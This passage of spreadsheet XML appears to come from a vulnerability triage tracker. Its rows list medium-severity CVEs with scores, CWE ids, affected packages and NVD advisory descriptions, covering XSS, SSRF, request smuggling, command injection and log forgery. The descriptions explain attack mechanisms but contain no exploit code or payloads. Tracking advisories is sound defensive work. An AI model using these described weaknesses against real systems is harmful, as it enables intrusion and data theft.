      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78294</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>Contributor Cross Site Scripting (XSS) in  Geo Mashup &lt;= 1.13.21 versions.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78294</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81453</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S271" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Filesystem access for attacker.</t>
        </is>
      </c>
      <c r="T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81453</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81868</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr"/>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Security.Authorization.Certificate</t>
        </is>
      </c>
      <c r="M272" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q272" s="5" t="inlineStr"/>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>CWE-288, CWE-295</t>
        </is>
      </c>
      <c r="S272" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. Prior to 4.3.0, Steeltoe.Security.Authorization.Certificate deployments using AddOrgAndSpacePolicies() and UseCertificateAuthorization() trust the public certificate supplied in the X-Client-Cert request header without proving possession of the corresponding private key. Common Cloud Foundry routers do not remove this header from inbound requests. When inbound requests are not restricted to a known trusted proxy source IP, an attacker who obtains the public certificate of an application instance in the target organization or space and can reach the application can spoof X-Client-Cert to bypass the SameOrg and SameSpace policies for the certificate validity period. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81868</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85078</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="inlineStr"/>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr"/>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr">
        <is>
          <t>pip:sanic</t>
        </is>
      </c>
      <c r="M273" s="5" t="inlineStr">
        <is>
          <t>24.12.1, 25.12.1</t>
        </is>
      </c>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q273" s="5" t="inlineStr"/>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S273" s="5" t="inlineStr">
        <is>
          <t>Sanic is an opensource python web server/framework. In version 25.12.0, Sanic's core HTTP/1.1 chunked-body handling does not fully consume the trailer-part after the terminating zero chunk before reusing the keep-alive connection buffer. A remote unauthenticated client can place attacker-controlled bytes in that trailer region, causing Sanic to parse and route them as a hidden second request after the outer request. This breaks HTTP request-boundary integrity and can provide a request-smuggling primitive when Sanic is deployed behind intermediaries. This issue is fixed in version 25.12.1.</t>
        </is>
      </c>
      <c r="T273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85078</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90923</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="inlineStr"/>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr"/>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q274" s="5" t="inlineStr"/>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S274" s="5" t="inlineStr">
        <is>
          <t>The Autopay WordPress plugin before 5.0.1 does not enforce the signature on one of its payment callbacks, allowing unauthenticated users to disclose and delete the stored payment parameters of other customers' orders.</t>
        </is>
      </c>
      <c r="T274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90923</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92912</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr"/>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q275" s="5" t="inlineStr"/>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>CWE-330</t>
        </is>
      </c>
      <c r="S275" s="5" t="inlineStr">
        <is>
          <t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 uses cryptographically weak uniqid() values for RTMP publish keys in LiveTransmition, reducing key entropy to approximately one million possibilities per creation second. Attackers who know the channel creation time can brute-force the five-digit microsecond component to forge valid stream keys and broadcast content as the channel owner.</t>
        </is>
      </c>
      <c r="T275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92912</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66608</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="inlineStr"/>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr"/>
      <c r="K276" s="5" t="inlineStr"/>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q276" s="5" t="inlineStr"/>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S276" s="5" t="inlineStr">
        <is>
          <t>Contributor Server Side Request Forgery (SSRF) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.19 versions.</t>
        </is>
      </c>
      <c r="T276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66608</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81443</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="inlineStr"/>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr"/>
      <c r="K277" s="5" t="inlineStr"/>
      <c r="L277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q277" s="5" t="inlineStr"/>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S277" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Server-Side Request Forgery (SSRF) vulnerability. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Server-side request forgery.</t>
        </is>
      </c>
      <c r="T277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81443</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86311</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="inlineStr"/>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr"/>
      <c r="K278" s="5" t="inlineStr"/>
      <c r="L278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q278" s="5" t="inlineStr"/>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S278" s="5" t="inlineStr">
        <is>
          <t>The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Shortcode Attributes in all versions up to, and including, 1.8.44 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86311</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86522</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="inlineStr"/>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr"/>
      <c r="K279" s="5" t="inlineStr"/>
      <c r="L279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q279" s="5" t="inlineStr"/>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>CWE-117</t>
        </is>
      </c>
      <c r="S279" s="5" t="inlineStr">
        <is>
          <t>Improper Output Neutralization for Logs vulnerability in team-alembic AshAuthentication allows an unauthenticated attacker to forge application log entries by submitting a password reset identity containing newlines or control characters.
AshAuthentication.Strategy.Password.RequestPasswordReset.run/3 interpolates the identity argument, the email or username taken straight from the reset request, into its Logger.warning/1 heredocs without escaping, truncating or type-restricting it. The resource logged beside it is passed through inspect/1, which would have neutralized the value. A newline in the identity therefore ends the log record, and everything after it is written as a line of its own, so an attacker chooses the severity tag and the content of entries that appear to have come from the application.
This issue affects ash_authentication: from 4.2.0 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86522</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92880</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="inlineStr"/>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr"/>
      <c r="K280" s="5" t="inlineStr"/>
      <c r="L280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q280" s="5" t="inlineStr"/>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="S280" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in vgmstream up to r2117. Impacted is the function vadpcm_read_coefs_be of the file src/coding/vadpcm_decoder.c of the component EA SCHl parser. This manipulation of the argument entry/entries causes out-of-bounds write. Remote exploitation of the attack is possible. Patch name: ae37662ad626254ddd96ad69ac263792d7a92024. It is suggested to install a patch to address this issue.</t>
        </is>
      </c>
      <c r="T280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92880</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92993</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="inlineStr"/>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr"/>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q281" s="5" t="inlineStr"/>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S281" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Dromara mayfly-go up to 1.11.5. The impacted element is the function RunMachineScript of the file server/internal/machine/api/machine_script.go of the component Machine Script Feature. The manipulation of the argument params results in os command injection. The attack can be executed remotely. The exploit is now public and may be used. Exploitation needs no admin account. Any account holding machine:script:run plus tag access reaches arbitrary command execution on machines whose templates contain {{.param}} placeholders; the SSH exec layer (Cli.Run) also applies no input filtering to any caller. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92993</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93394</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="inlineStr"/>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr"/>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q282" s="5" t="inlineStr"/>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S282" s="5" t="inlineStr">
        <is>
          <t>A flaw in libmongoc's SCRAM authentication implementation caused the client to continue the authentication handshake and transmit the client proof even when a nonce mismatch was detected in the server's first message. An unauthorized party with a man-in-the-middle position could exploit this by injecting a crafted server-first-message containing a controlled salt and low iteration count, then capturing the resulting client proof to perform offline password cracking. This vulnerability is mitigated by TLS, which is standard in production deployments.</t>
        </is>
      </c>
      <c r="T282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93394</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54521</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="inlineStr"/>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr"/>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P283" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q283" s="5" t="inlineStr"/>
      <c r="R283" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S283" s="5" t="inlineStr">
        <is>
          <t>FairEmail is a fully featured, open source, privacy-friendly email app for Android. Prior to 1.2319, the ActivityAMP AMP message renderer in app/src/main/java/eu/faircode/email/ActivityAMP.java enables JavaScript in its WebView but incompletely sanitizes untrusted message HTML. For non-allowlisted hosts, script.removeAttr("src") leaves inline script elements in the document and does not reject event-handler attributes or javascript: URLs on other elements. A crafted AMP email can execute arbitrary JavaScript when a recipient opens the message and enables the AMP toggle. The script can read the message DOM, exfiltrate message data, and display phishing overlays within the message-body area. Exploitation requires the recipient to enable the AMP toggle, and practical exposure is reduced because AMP email is uncommon. This issue is fixed in version 1.2319.</t>
        </is>
      </c>
      <c r="T283" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54521</t>
        </is>
      </c>
    </row>
    <row r="284">
      <c r="A284" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B284" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C284" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54644</t>
        </is>
      </c>
      <c r="D284" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E284" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F284" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G284" s="5" t="inlineStr"/>
      <c r="H284" s="5" t="inlineStr"/>
      <c r="I284" s="5" t="inlineStr"/>
      <c r="J284" s="5" t="inlineStr"/>
      <c r="K284" s="5" t="inlineStr"/>
      <c r="L284" s="5" t="inlineStr"/>
      <c r="M284" s="5" t="inlineStr"/>
      <c r="N284" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O284" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P284" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q284" s="5" t="inlineStr"/>
      <c r="R284" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S284" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, the _errorMessage method in classes/gui.class.php uses strip_tags to permit anchor elements in error, information, and warning messages while retaining unsafe href values and onclick event handlers. Attacker-controlled search or input data that reaches a GUI message can carry a javascript: URI or event handler through the filter, and viewing or interacting with the rendered anchor executes JavaScript in the victim's browser session, enabling session exposure or unauthorized application actions. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T284" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54644</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55946</t>
        </is>
      </c>
      <c r="D285" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E285" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F285" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr"/>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr"/>
      <c r="L285" s="5" t="inlineStr"/>
      <c r="M285" s="5" t="inlineStr"/>
